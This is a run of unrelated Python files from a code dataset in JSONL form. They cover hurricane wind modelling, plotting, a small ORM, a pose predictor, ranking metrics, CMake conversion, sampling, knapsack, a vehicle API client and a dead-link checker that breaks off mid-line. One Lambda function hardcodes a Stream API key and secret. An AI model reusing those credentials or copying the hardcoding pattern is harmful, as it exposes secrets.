= convert2grid(Lat,Lon,topo_info)\n\n Pc = Pressure * 100.\n Pe = 1013. *100.\n if Pe <= Pc:\n Pe = Pc * 1.05\n deltaP = (Pe-Pc)/100.\n Rmax = ( math.exp(2.636-0.00005086*deltaP**2+0.037842*28.)) * 1000.\n\n HSpd = math.sqrt( HurricaneMotionU**2+HurricaneMotionV**2 )\n HDir = math.atan2( HurricaneMotionV, HurricaneMotionU )\n \n\n def getWindAtDist(px,py):\n umin = 1000.\n r = -1\n r0 = 1200.*1000.\n a = 0.25\n m =1.6\n n = 0.9\n r = numpy.sqrt(py**2+px**2)\n \n \n f1 = (Wind-HSpd)**2\n f2 = ((r0-r)/(r0-Rmax))**2\n f3 = (r/Rmax)**2\n \n t1n = (1.-a)*(n+m)\n t1d = n+m*(r/Rmax)**(2.*(n+m))\n t2n = a*(1.+2.*m)\n t2d = 1.+2.*m*(r/Rmax)**(2.*(m+1.))\n Vholland=numpy.sqrt(f1*f2*f3*(t1n/t1d+t2n/t2d))\n \n # if r > 0:\n Vholland[r <=0] = 0\n \n Beta = -HDir - numpy.arctan2(py,px)\n \n rotation = HSpd*numpy.sin(-Beta)\n u = (Vholland +rotation) #/ 0.44704\n del(r)\n del(Vholland)\n del(Beta)\n del(rotation)\n return u\n\n #Set up distance grid\n #Distane grid is expected to be ascending in x direction from west to east\n #And ascending in the y direction from north to south (opposite of normal)\n gridWidth = window_width*res\n gridHeight = window_height*res\n \n row = numpy.array([numpy.arange(-gridWidth,gridWidth+1,res).astype('float32')])\n px = numpy.repeat(row,row.shape[1],0)\n py = numpy.repeat(numpy.rot90(row),row.shape[1],1)*-1\n \n #Get wind at distance\n u =getWindAtDist(px,py)\n\n #Use this to get the wind at a specific distance\n # print(getWindAtDist(numpy.array([20174.875]),numpy.array([12400])))\n \n u[u 0 and Hgt > 0: #Hgt > 0 and Spacing > 0 and Hgt - CBH>0:\n# Z = 1.3\n# b = 2.*CrownDepth/Hgt\n# l = b*CrownDepth/Spacing*0.5\n# G35 = (1.-math.exp(-math.sqrt(15*l)))/math.sqrt(15*l)\n# D = Hgt*(1.-G35)\n# UstarRatio = min(0.3, math.sqrt(0.003+0.3*l))\n# PsiH = 0.193\n# Z0H = G35*math.exp(-0.4/UstarRatio-PsiH)\n# HD = Spacing / Hgt\n# z0 = Z0H * Hgt\n# BMmean = 0.68*HD-0.0385+(-0.68*HD+0.4785)*(1.7239*HD+0.0316)**(5)\n# BMmax = 2.7193*HD-0.061+(1.273*HD+0.9701)*(1.1127*HD+0.0311)**5\n# G = BMmax/BMmean\n# MOR = ModRupture*6894.757\n# Mcrit = 0.00358811*MOR\n# try:\n# M = 1.22*(D-Z)*1.226*G*(0.4*Spacing*WindSpeed/math.log((Hgt-D)/z0))**2\n# except:\n# print(Hgt,Spacing, WindSpeed)\n# print(D, Z, G, Spacing, WindSpeed, Hgt, z0)\n# if M<0:\n# print('Negative M: ', BMmax, BMmean, Hgt, Spacing, WindSpeed, CBH)\n\n# R = M/Mcrit - 1.\n# return ( int(100. * math.exp(R) / (math.exp(R)+1.) ) - 50) *2\n# else:\n# return 0\n\n##################################################################\n","sub_path":"CreateHurricaneWindFieldsAndGALESOptimized_lib.py","file_name":"CreateHurricaneWindFieldsAndGALESOptimized_lib.py","file_ext":"py","file_size_in_byte":17016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"558830795","text":"import matplotlib.pyplot as plt\nn = 200\nn_last = 150\n\n\nif __name__ == '__main__':\n\n\n\n\tstats = {}\n\tTB_list = [20, 23, 25, 27, 28, 29, 30, 31, 32, 33, 35, 37, 40]\n\n\n\n\tfor TB in TB_list:\n\n\n\t\tstats[TB] = {}\n\n\n\t\tfilename = \"./data_TB/statistic_TB\" + str(TB) + \".ibd\"\n\t\tfile = open(filename, \"r\")\n\n\t\tcount = 0\n\t\twhile 1:\n\t\t\tline = file.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\n\t\t\tcount += 1\n\t\t\tif count == 1:\n\t\t\t\tcontinue\n\n\t\t\tline = (line.strip()).split(\" \")\n\t\t\ti = int(line[0])\n\t\t\tfraction = float(line[1])\n\t\t\tstats[TB][i] = fraction\n\n\n\n\n\n\n\t## draw the likelihood curve, for N = 5000\n\tx = []\n\ty = []\n\tfor TB in TB_list:\n\n\t\tx.append(TB)\n\n\t\tdistance = 0\n\t\ti = 5\n\t\twhile i < n_last:\n\t\t\tdistance += (stats[30][i] - stats[TB][i]) * (stats[30][i] - stats[TB][i])\n\t\t\ti += 5\n\t\ty.append(distance)\n\n\n\n\n\t## actually draw the figure\n\tplt.figure()\n\t#plt.plot(x, y, \"*-\",label=\"$N=10000$\", color=\"blue\")\n\tplt.plot(x, y, \"*-\", color=\"blue\")\n\tplt.plot([30], [0], \"o-\", color=\"red\", label=\"true TB\")\n\n\n\n\n\n\tplt.xlabel(\"TB\")\n\tplt.ylabel(\"Sum of Squared Distance\")\n\tplt.title(\"Distance Curve for $TB_{real}$ = 30 (50 * 20 times for averaging)\")\n\t#plt.ylim(0, 1)\n\t#plt.xlim(0, 200)\n\tplt.legend(loc=1)\n\tplt.grid('on')\n\tplt.show()\n","sub_path":"plot_like_TB.py","file_name":"plot_like_TB.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"155759646","text":"import sqlite3, os, functools, collections\nfrom .fields import Field, Title\nfrom sqlite_wrapper import create_table, verify_table_columns \n\n# Inspired by Django's BaseModel this will serve as a base from which\n# all future models (in the database schema) will be derivatives of.\nclass BaseModel(type):\n\n #This is we can keep the items sorted from 'dct' in __new__ otherwise the\n #dct instance will be a dict() and thus .items() will be unordered == bad!\n @classmethod\n def __prepare__(self, *args, **kwargs):\n\n return collections.OrderedDict()\n\n # How the new class is to be created...\n def __new__(meta, name, bases, dct):\n\n # we want to ensure every model class has a _meta attribute\n # that can be accessed through the ORM for various things...\n if 'Meta' not in dct:\n dct['Meta'] = type('Meta', (object,), {})\n _meta = dct.pop('Meta')\n _meta.fields = collections.OrderedDict()\n _meta.table_name = name\n\n #Go ahead and create the class....\n cls = super().__new__(meta, name, bases, dct)\n # Sets _meta attribute to contain the models fields and other attributes.\n cls._meta = _meta\n\n # Note: The fields here from dct will still be in ordered \n # when transferring to the other OrderedDict due to the \n # __prepare__ method above...\n for k, v in dct.items():\n # If the item in the class dict is a Field / subclass\n # then collect it in the _meta's field attribute.\n if isinstance(v, Field):\n cls._meta.fields[k] = v\n setattr(v, 'name', k)\n setattr(v, 'model', cls)\n\n # If the model is laballed as abstract we want to check \n # whether it inherited this abstract property, or if the\n # model is actually meant to be abstract to ensure that\n # all tables are properly created...\n inherited = False\n for base in bases:\n _meta.fields.update(base._meta.fields)\n if not inherited and getattr(base._meta, 'abstract', False):\n inherited = True\n\n # Two cases, is abstract -> due to subclass and we want to\n # create the table anyways.\n if 'abstract' in _meta.__dict__:\n abstract = getattr(_meta, 'abstract', False)\n if (inherited and not abstract) or not abstract:\n create_table(cls, name)\n else:\n create_table(cls, name)\n return cls\n\nclass Model(metaclass=BaseModel):\n\n #This simply verifies that the kwargs passed are valid\n #columns for the models table in the database, this ensures\n #that the setattr() is setting valid attributes and that the\n #save method will not run into (column / data) issues. Others\n #such as integrity etc can still occur of course.\n\n @verify_table_columns\n def __init__(self, **kwargs):\n\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n \"\"\" This simply overrides the __setattr__ method in order\n to check if the user is attempting to alias the field\n definitions to something else if so, then we delegate this\n action to the fields property (setter) in order to change \n the fields value only instead of changing the field \n definition itself.\n\n Note: \n\n This also saves from doing --> (Field Name).value = * \n and they can simply do --> (Field Name) = * \n in order to change the value that the field has. \"\"\"\n\n def __setattr__(self, name, value):\n\n if name in self._meta.fields:\n self._meta.fields[name].value = value\n super().__setattr__(name, value)\n \n def save(self):\n\n field_values = [x.value for x in self._meta.fields.values()]\n row = {k: v for k,v in zip(self._meta.fields, field_values)}\n return self.sqlite.insert(self, **row)\n\n # This serves as the base model from which derivatives may be formed\n # thus we want it to be represented abstractly rather than appearing\n # within the schema since the user has no direct interaction with\n # this base unless specified explicitly.\n class Meta:\n\n abstract = True","sub_path":"models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"236603234","text":"import os\nimport torch\nimport inspect\n\nfrom .utils.load_checkpoint import load_checkpoint\nfrom .utils.functional import *\nfrom .utils.preprocess import *\nfrom .model.net2 import Net2\n\n\nMODEL_CONFIG = {\"net_type\": Net2, \"n_class\": 3, \"use_dist\": False, \"use_dist_angles\": False,\n \"n_points\": 17}\n\nCHECKPOINT = \"assets/pretrained.pth\"\n\n\ndef init_model(model_configs, checkpoint):\n model = model_configs[\"net_type\"](**MODEL_CONFIG)\n model = load_checkpoint(model, checkpoint)\n if torch.cuda.is_available():\n model = model.cuda()\n model.eval()\n return model\n\n\ndef predict(model, landmarks):\n landmarks = torch.tensor(landmarks)\n if torch.cuda.is_available():\n landmarks = landmarks.cuda().float()\n landmarks = torch.unsqueeze(landmarks, 0) # add batch dimension\n outputs = model(landmarks)\n outputs = outputs.cpu().detach().numpy()\n return outputs\n\n\ndef landmarks_to_angles_model():\n checkpoint_abs_path = os.path.join(os.path.split(os.path.abspath(inspect.getfile(predict)))[0], CHECKPOINT)\n model = init_model(MODEL_CONFIG, checkpoint_abs_path)\n return model\n\n\ndef to_angles(landmarks, model):\n if MODEL_CONFIG[\"n_points\"] == 68:\n landmarks = landmarks\n elif MODEL_CONFIG[\"n_points\"] in mapping_points:\n landmarks = mapping_points[MODEL_CONFIG[\"n_points\"]](landmarks)\n else:\n print(\"[ERROR] %d-point landmarks is not supported\" % MODEL_CONFIG[\"n_points\"])\n quit()\n if MODEL_CONFIG[\"use_dist\"]:\n landmarks = normalize_dist(points_to_dists(landmarks))\n elif MODEL_CONFIG[\"use_dist_angles\"]:\n landmarks = landmarks_to_dist_angles(landmarks)\n else:\n landmarks = normalize_landmarks(standardize_landmarks(landmarks))\n pose = predict(model, landmarks)[0]\n return pose\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"landmarks_to_angles/landmarks_to_angles.py","file_name":"landmarks_to_angles.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"150755663","text":"import torch\n\nfrom .metric import Metric\n\n\nclass MeanReciprocalRank(Metric):\n\n def __init__(self, *args, mode='prob', **kwargs):\n super().__init__(*args, **kwargs)\n self.update = {\n 'prob': self.update_prob,\n 'idx': self.update_idx}[mode]\n\n def reset(self, mode='prob'):\n self.ranks = []\n\n def update(self, output):\n raise NotImplementedError()\n\n def update_prob(self, output):\n probs, target = output\n if (probs < 0).any():\n assert (probs <= 0).all()\n probs = torch.exp(probs)\n correct_prob = probs.gather(1, target.unsqueeze(1))\n rank = (probs >= correct_prob).sum(dim=1)\n self.ranks.append(rank.cpu())\n\n def update_idx(self, output):\n pred_idx, target = output\n matches = pred_idx == target.unsqueeze(1)\n bs, max_rank = pred_idx.shape\n rank = torch.zeros(bs).long() + max_rank\n match_batch_idxs, match_rank = matches.nonzero().t().cpu()\n # + 1 to convert from zero-indexed to rank\n rank[match_batch_idxs] = match_rank + 1\n self.ranks.append(rank)\n\n def compute(self):\n rank = torch.cat(self.ranks)\n return (1 / rank.float()).mean()\n","sub_path":"dougu/ignite/metrics/mean_reciprocal_rank.py","file_name":"mean_reciprocal_rank.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"112910775","text":"from respond import respond\nimport stream\n\n\ndef get_token(event):\n\ttry:\n\t\tclient = stream.connect('mwb8vtrjbmak', 'vqamq876cznxede4fvgpt247w82pwuxs3wwru8sku7nv9w8azp6ae5zn52cp6qz9',\n\t\t\t\t\t\t\t\tlocation='us-east')\n\t\tuser_feed = client.feed(event['queryStringParameters']['mode'], event['queryStringParameters']['user'])\n\t\treturn respond(None, user_feed.get_readonly_token(), None)\n\texcept Exception as e:\n\t\treturn respond(e, None, 502)\n","sub_path":"API/getToken.py","file_name":"getToken.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"396075593","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2016-2017:\n# Matthieu Estrada, ttamalfor@gmail.com\n#\n# This file is part of (CMakeConverter).\n#\n# (CMakeConverter) is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# (CMakeConverter) is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with (CMakeConverter). If not, see .\n\n\"\"\"\n Data Files\n ==========\n Manage the **VS Project** data and creation of **CMakeLists.txt** file\n\"\"\"\n\nfrom lxml import etree\n\nfrom cmake_converter.message import send\n\n\ndef get_vcxproj_data(vs_project):\n \"\"\"\n Return xml data from \"vcxproj\" file\n\n :param vs_project: the vcxproj file\n :type vs_project: str\n :return: dict with VS Project data\n :rtype: dict\n \"\"\"\n\n vcxproj = {}\n\n try:\n tree = etree.parse(vs_project)\n namespace = str(tree.getroot().nsmap)\n ns = {'ns': namespace.partition('\\'')[-1].rpartition('\\'')[0]}\n vcxproj['tree'] = tree\n vcxproj['ns'] = ns\n assert 'http://schemas.microsoft.com' in ns['ns']\n except AssertionError: # pragma: no cover\n send(\n '.vcxproj file cannot be import, because this file does not seem to comply with'\n ' Microsoft xml data !',\n 'error'\n )\n exit(1)\n except (OSError, IOError): # pragma: no cover\n send(\n '.vcxproj file cannot be import. '\n 'Please, verify you have rights to this directory or file exists !',\n 'error'\n )\n exit(1)\n except etree.XMLSyntaxError: # pragma: no cover\n send('This file is not a \".vcxproj\" file or XML is broken !', 'error')\n exit(1)\n\n return vcxproj\n\n\ndef get_propertygroup(target, platform, attributes=''):\n \"\"\"\n Return \"propertygroup\" value for wanted platform and target\n\n :param target: wanted target: debug | release\n :type target: str\n :param platform: wanted platform: x86 | x64\n :type platform: str\n :param attributes: attributes to add to namespace\n :type attributes: str\n :return: \"propertygroup\" value\n :rtype: str\n \"\"\"\n\n prop_deb_x86 = \\\n '//ns:PropertyGroup[@Condition=\"\\'$(Configuration)|$(Platform)\\'==\\'Debug|Win32\\'\"%s]' % \\\n attributes\n prop_deb_x64 = \\\n '//ns:PropertyGroup[@Condition=\"\\'$(Configuration)|$(Platform)\\'==\\'Debug|x64\\'\"%s]' % \\\n attributes\n prop_rel_x86 = \\\n '//ns:PropertyGroup[@Condition=\"\\'$(Configuration)|$(Platform)\\'==\\'Release|Win32\\'\"%s]' % \\\n attributes\n prop_rel_x64 = \\\n '//ns:PropertyGroup[@Condition=\"\\'$(Configuration)|$(Platform)\\'==\\'Release|x64\\'\"%s]' % \\\n attributes\n\n propertygroups = {\n 'debug': {\n 'x86': prop_deb_x86,\n 'x64': prop_deb_x64,\n },\n 'release': {\n 'x86': prop_rel_x86,\n 'x64': prop_rel_x64\n }\n }\n\n return propertygroups[target][platform]\n\n\ndef get_definitiongroup(target, platform):\n \"\"\"\n Return ItemDefinitionGroup namespace depends on platform and target\n\n :param target: wanted target: debug | release\n :type target: str\n :param platform: wanted platform: x86 | x64\n :type platform: str\n :return: wanted ItemDefinitionGroup namespace\n :rtype: str\n \"\"\"\n\n item_deb_x86 = \\\n '//ns:ItemDefinitionGroup[@Condition=\"\\'$(Configuration)|' \\\n '$(Platform)\\'==\\'Debug|Win32\\'\"]'\n item_deb_x64 = \\\n '//ns:ItemDefinitionGroup[@Condition=\"\\'$(Configuration)|' \\\n '$(Platform)\\'==\\'Debug|x64\\'\"]'\n item_rel_x86 = \\\n '//ns:ItemDefinitionGroup[@Condition=\"\\'$(Configuration)|' \\\n '$(Platform)\\'==\\'Release|Win32\\'\"]'\n item_rel_x64 = \\\n '//ns:ItemDefinitionGroup[@Condition=\"\\'$(Configuration)|' \\\n '$(Platform)\\'==\\'Release|x64\\'\"]'\n\n itemdefinitiongroups = {\n 'debug': {\n 'x86': item_deb_x86,\n 'x64': item_deb_x64,\n },\n 'release': {\n 'x86': item_rel_x86,\n 'x64': item_rel_x64\n }\n }\n\n return itemdefinitiongroups[target][platform]\n\n\ndef get_cmake_lists(cmake_path=None):\n \"\"\"\n Create CMakeLists.txt file in wanted \"cmake_path\"\n\n :param cmake_path: path where CMakeLists.txt should be write\n :type cmake_path: str\n :return: cmake file wrapper opened\n :rtype: _io.TextIOWrapper\n \"\"\"\n\n if not cmake_path:\n send('CMakeLists will be build in current directory.', '')\n cmake = open('CMakeLists.txt', 'w')\n else:\n send('CmakeLists.txt will be build in : ' + str(cmake_path), 'warn')\n if cmake_path[-1:] == '/' or cmake_path[-1:] == '\\\\':\n cmake = open(str(cmake_path) + 'CMakeLists.txt', 'w')\n else:\n cmake = open(str(cmake_path) + '/CMakeLists.txt', 'w')\n\n return cmake\n","sub_path":".local/lib/python3.6/site-packages/cmake_converter/data_files.py","file_name":"data_files.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"222257468","text":"import math\r\nimport numpy as np\r\nimport pdb\r\n\r\n#==========================================================================================================================================\r\n# SamplingError Class\r\n#==========================================================================================================================================\r\nclass SamplingError(Exception):\r\n def __init__(self, message: str, samplingMode: str, innerSetCount: int, outerSetCount: int):\r\n \r\n prompt = \"\\nSampling Error: \" + message\r\n prompt += \"\\n\\tSampling Strategy: \" + samplingMode\r\n prompt += \"\\n\\tInner Set: \" + str(innerSetCount)\r\n prompt += \"\\n\\tOuter Set: \" + str(outerSetCount)\r\n \r\n super(SamplingError, self).__init__(prompt)\r\n \r\n#------------------------------------------------------------------------------------------------------------------------------------------\r\n# sample Method\r\n#------------------------------------------------------------------------------------------------------------------------------------------\r\ndef sample(population: dict, innerSet: set, outerSet: set, getProbability, samplingStrategy: str = '', sampleSize: int = 1) -> list:\r\n \"\"\" \r\n Method: \r\n \r\n list sample\r\n (\r\n dict population,\r\n set innerSet,\r\n set outerSet\r\n Function: float getProbability(S item),\r\n string samplingMode,\r\n int sampleSize\r\n )\r\n \r\n Description: \r\n This method generates a random sample of items of type S from a population. The inner and outer sets are subsets of the population, \r\n and can be used to narrow the pool of candididate items. A list of keys of type T is returned.\r\n Five sampling strategies can be selected from:\r\n (1) Cut-off: \r\n All items in the inner set of the population are assigned an inclusion probability of 1. All items outside of \r\n the inner set but inside the outer set are assigned an inclusion probability of 0.\r\n (2) Proportional:\r\n All items are assigned an inclusion probability via the getProbability function.\r\n (3) Top Proportional:\r\n All items in the inner set of the population are assigned an inclusion probability via the getProbability function. \r\n All items outside of the inner set but inside the outer set are assigned an inclusion probability of 0.\r\n (4) Random: \r\n All items in the population are assigned an inclusion probability of 1. Default strategy.\r\n \r\n Arguments:\r\n dict population:\r\n A dictionary mapping generic items of type S to unique keys of type T.\r\n set innerSet:\r\n Set of item IDs belonging to the population. The inner set is a subset of the outer set.\r\n set outerSet:\r\n Set of item IDs belonging to the population.\r\n Function: float getProbability(S item):\r\n A function that accepts a generic item of type S and returns a floating point inclusion probability.\r\n string samplingStrategy:\r\n A string flag that describes what sampling strategy is to be applied.\r\n Values:\r\n := 'cutoff' : applies the cut-off sampling strategy\r\n := 'proportional' : applies the proportional sampling strategy\r\n := 'top_proportional' : applies the top proportional strategy\r\n int sampleSize:\r\n Size of the sample. \r\n \r\n Output:\r\n list\r\n \"\"\"\r\n \r\n # If the population size is empty, raise a Sampling Error\r\n if len(population) == 0:\r\n pdb.set_trace()\r\n raise SamplingError(\"The population dict is empty.\", samplingStrategy, len(innerSet), len(outerSet))\r\n \r\n # Apply the chosen sampling strategy to construct a subpopulation and a probability vector\r\n \r\n # Case 1: Cut-off sampling.\r\n if samplingStrategy == 'cutoff':\r\n subPopulation = list(innerSet)\r\n probabilities = None\r\n \r\n # Case 2: Proportional sampling.\r\n elif samplingStrategy == 'proportional':\r\n # innerSet|outerSet returns the union of the inner set and the outer set\r\n subPopulation, probabilities = proportionalSampling(population, innerSet|outerSet, getProbability)\r\n \r\n # Case 3: Top proportional sampling.\r\n elif samplingStrategy == 'top_proportional':\r\n subPopulation, probabilities = proportionalSampling(population, innerSet, getProbability)\r\n \r\n # Case 4: Random sampling.\r\n else:\r\n subPopulation = list(outerSet)\r\n probabilities = None\r\n \r\n # If the subpopulation size is empty, raise a Sampling Error\r\n if len(subPopulation) == 0:\r\n raise SamplingError(\"The sub-population is empty.\", samplingStrategy, len(innerSet), len(outerSet))\r\n \r\n # Case 1: The probability vector is empty.\r\n if probabilities == None:\r\n # All items are given an equal inclusion probability.\r\n sampleArray = np.random.choice(subPopulation, sampleSize)\r\n \r\n # Case 2: The probability vector is not empty.\r\n else:\r\n try:\r\n \r\n # Normalize the probability vector such that the sum of the vector's elements is 1\r\n pSum = sum(probabilities)\r\n \r\n # Case 2.1: The sum of all elements is 0 or is infinity.\r\n if pSum == 0 or pSum == math.inf:\r\n # All items are given an equal inclusion probability.\r\n weight = 1 / len(subPopulation)\r\n probabilities = [weight for a in range(len(subPopulation))]\r\n \r\n # Case 2.2: The sum of all elements is a non-zero real number.\r\n else:\r\n probabilities = list(map(lambda x: x / pSum, probabilities))\r\n \r\n # Construct a random sample of items\r\n sampleArray = np.random.choice(subPopulation, sampleSize, p=probabilities)\r\n \r\n except ZeroDivisionError as e:\r\n pdb.set_trace()\r\n \r\n return list(sampleArray)\r\n \r\n#------------------------------------------------------------------------------------------------------------------------------------------\r\n# proportionalSampling Method\r\n#------------------------------------------------------------------------------------------------------------------------------------------ \r\ndef proportionalSampling(population: dict, itemSet: set, getProbability) -> tuple:\r\n \r\n \"\"\"\r\n Method:\r\n \r\n tuple, list> cutoffSampling\r\n (\r\n dict population,\r\n set innerSet,\r\n Function: float getProbability(S item) \r\n )\r\n \r\n Description:\r\n Assigns an inclusion probability to all items in the set via the getProbability function.\r\n \r\n Arguments\r\n dict population:\r\n A dictionary of generic items of type S mapped to keys of type T.\r\n set itemSet:\r\n A set of item keys of type T.\r\n Function: float getProbability(S item)\r\n \r\n Output:\r\n tuple, list> { subPopulation, probabilities }\r\n subPopulation: A list of item keys of type T\r\n probabilities: A list of floating point probabilities\r\n \"\"\"\r\n \r\n subPopulation = []\r\n probabilities = []\r\n \r\n for ID in itemSet:\r\n subPopulation.append(ID)\r\n probabilities.append(getProbability(population[ID]))\r\n \r\n return subPopulation, probabilities","sub_path":"sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":7685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311398480","text":"'''\n0 1 Knapsack - Problem\nSend Feedback A thief robbing a store can carry a maximal weight of W into his knapsack. There are N items, and i-th item weigh 'Wi' and the value being 'Vi.' What would be the maximum value V, that the thief can steal?\n'''\nfrom sys import stdin\n\ndef knapsack(weights, values, n, maxWeight) :\n K=[[0 for x in range(maxWeight+1)] for x in range(n+1)]\n for i in range(n+1):\n for w in range(maxWeight+1):\n if i==0 or w==0:\n K[i][w]=0\n elif weights[i-1]<=w:\n K[i][w]=max(values[i-1]+K[i-1][w-weights[i-1]],K[i-1][w])\n else:\n K[i][w]=K[i-1][w]\n return K[n][w]\ndef takeInput() :\n n = int(stdin.readline().rstrip())\n\n if n == 0 :\n return list(), list(), n, 0\n\n weights = list(map(int, stdin.readline().rstrip().split(\" \")))\n values = list(map(int, stdin.readline().rstrip().split(\" \")))\n maxWeight = int(stdin.readline().rstrip())\n\n return weights, values, n, maxWeight\n\n\n#main\nweights, values, n, maxWeight = takeInput()\n\nprint(knapsack(weights, values, n, maxWeight))","sub_path":"algorithms/Python/dynamic_programming/0 1 Knapsack .py","file_name":"0 1 Knapsack .py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"357536142","text":"import requests\nfrom lib.settings import baseUrlSettings\nfrom lib.logger import logger\n\nclass VehicleSecurityInfo:\n\tdef getGMVehicleSecurityInfo(self, vehicleId):\n\t\theader = {\n\t\t\t\"Content-Type\": \"application/json\"\n\t\t}\n\t\tpayload = {\n\t\t\t\"id\": vehicleId,\n\t\t\t\"responseType\": \"JSON\"\n\t\t}\n\t\turl = baseUrlSettings()\n\t\tif url is None:\n\t\t\t# Unable to fetch URL from env file. Return error\n\t\t\tlogger.error(\"Unable to fetch URL from env file\")\n\t\t\treturn {\"status\": False}\n\t\ttry:\n\t\t\turl += \"/getSecurityStatusService\"\n\t\t\tr = requests.post(url=url, json=payload, headers=header)\n\t\t\tif r.status_code != 200:\n\t\t\t\t# Invalid response code. Return error\n\t\t\t\tlogger.error(\"Invalid response code for GM API /getSecurityStatusService :: STATUS -> %s, RESPONSE -> %s\" % (r.status_code, r.text))\n\t\t\t\treturn {\"status\": False}\n\n\t\t\t# Success in getting data from GM\n\t\t\tr = r.json()\n\t\t\tlogger.debug(\"Data for vehicleId %s is %s\" % (vehicleId, r))\n\n\t\t\tresult = []\n\t\t\t# Process the response to form result\n\t\t\t\"\"\"\n\t\t\tSample response from GM is as follows:\n\t\t\t{\n\t\t\t \"service\": \"getSecurityStatus\",\n\t\t\t \"status\": \"200\",\n\t\t\t \"data\": {\n\t\t\t \"doors\": {\n\t\t\t \"type\": \"Array\",\n\t\t\t \"values\": [\n\t\t\t {\n\t\t\t \"location\": {\n\t\t\t \"type\": \"String\",\n\t\t\t \"value\": \"frontLeft\"\n\t\t\t },\n\t\t\t \"locked\": {\n\t\t\t \"type\": \"Boolean\",\n\t\t\t \"value\": \"False\"\n\t\t\t }\n\t\t\t },\n\t\t\t {\n\t\t\t \"location\": {\n\t\t\t \"type\": \"String\",\n\t\t\t \"value\": \"frontRight\"\n\t\t\t },\n\t\t\t \"locked\": {\n\t\t\t \"type\": \"Boolean\",\n\t\t\t \"value\": \"True\"\n\t\t\t }\n\t\t\t },\n\t\t\t {\n\t\t\t \"location\": {\n\t\t\t \"type\": \"String\",\n\t\t\t \"value\": \"backLeft\"\n\t\t\t },\n\t\t\t \"locked\": {\n\t\t\t \"type\": \"Boolean\",\n\t\t\t \"value\": \"False\"\n\t\t\t }\n\t\t\t },\n\t\t\t {\n\t\t\t \"location\": {\n\t\t\t \"type\": \"String\",\n\t\t\t \"value\": \"backRight\"\n\t\t\t },\n\t\t\t \"locked\": {\n\t\t\t \"type\": \"Boolean\",\n\t\t\t \"value\": \"True\"\n\t\t\t }\n\t\t\t }\n\t\t\t ]\n\t\t\t }\n\t\t\t }\n\t\t\t}\n\t\t\t\"\"\"\n\t\t\tfor val in r[\"data\"][\"doors\"][\"values\"]:\n\t\t\t\tx = {\n\t\t\t\t\t\"location\": val[\"location\"][\"value\"],\n\t\t\t\t\t\"locked\": bool(val[\"locked\"][\"value\"])\n\t\t\t\t}\n\t\t\t\tresult.append(x)\n\t\t\treturn {\"status\": True, \"result\": result}\n\t\t\n\t\texcept Exception as e:\n\t\t\t# Exception while calling/processing GM API\n\t\t\tlogger.critical(\"Exception :: %s\" % e)\n\t\t\treturn {\"status\": False}\n","sub_path":"models/VehicleSecurityInfo.py","file_name":"VehicleSecurityInfo.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"56049993","text":"\nfrom dao import dbconnection\nclass Task:\n def __init__(self, taskid, taskname, description, status, priority, notes, bookmark, ownerid, creatorid, createdon,\n modifiedon):\n self.taskid = taskid\n self.taskname = taskname\n self.description = description\n self.status = status\n self.priority = priority\n self.notes = notes\n self.bookmark = bookmark\n self.ownerid = ownerid\n self.creatorid = creatorid\n self.createdon = createdon\n self.modifiedon = modifiedon\n dbconnection.insert(taskid, taskname, description, status, priority, notes, bookmark, ownerid, creatorid,\n createdon, modifiedon)\n\n","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"150567949","text":"# -*- coding: GBK -*-\nimport conf\nimport request\nimport logging\nimport urlparse\nimport util\n\n\ndef _is_home_page(url):\n ent = url.split(u'/')\n if len(ent) <= 3:\n return True\n if len(ent) == 4:\n if len(ent[3]) == 0:\n return True\n if ent[3] == u'index' or ent[3] == u'index.html' or ent[3] == u'index.shtml' or ent[3] == u'index.php':\n return True\n return False\n\n\ndef _home_page_resp(req):\n err, msg = request.code_msg.get(u'r_t_h_p')\n resp = req.get_resp()\n resp.code, resp.msg = err, msg\n logging.info('find dead: [target_url:%s][cur_url:%s] code: %d, msg: %s' %\n (req.target_url, req.cur_url, resp.code, resp.msg))\n return resp\n\n\ndef judge(site_conf, req):\n # TO REMOVE\n # req = request.Request()\n if req.cur_url and req.target_url != req.cur_url:\n for rule in site_conf.rules:\n if isinstance(rule, conf.SiteConf.Rule) and rule.method == u'link':\n ret = rule.check_match(req.cur_url)\n if ret:\n err, msg = request.code_msg.get(u'url_match')\n resp = req.get_resp()\n resp.code = err\n resp.msg = msg % rule.match_str()\n logging.info('find dead: [target_url:%s][cur_url:%s] code: %d, msg: %s' %\n (req.target_url, req.cur_url, resp.code, resp.msg))\n return resp\n if 